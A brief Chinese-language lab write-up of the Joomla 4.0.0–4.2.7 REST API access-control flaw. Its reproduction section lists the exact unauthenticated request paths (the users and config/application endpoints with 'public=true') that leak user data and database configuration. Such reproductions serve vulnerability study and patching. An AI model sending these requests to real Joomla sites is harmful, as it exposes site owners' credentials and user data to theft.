一、漏洞概述
Joomla对Web服务端点的访问控制存在缺陷,鉴权存在错误,导致未经身份认证的攻击者可构造恶意请求未授权访问RestAPI 接口,造成敏感信息泄漏,获取Joomla数据库相关配置信息。
二、影响范围
4.0.0 <= Joomla <= 4.2.7
三、访问页面
四、漏洞复现
1、访问接口,返回flag
/api/index.php/v1/users?public=true
/api/index.php/v1/users?public=true&key=value
2、其他未授权接口
/api/index.php/v1/config/application?public=true
五、扩展信息
Joomla 大致有三个路由入口,分别是:
-
根目录的index.php(用户访问)
-
根目录的administrator/index.php(管理员)
-
根目录的api/index.php(Rest API)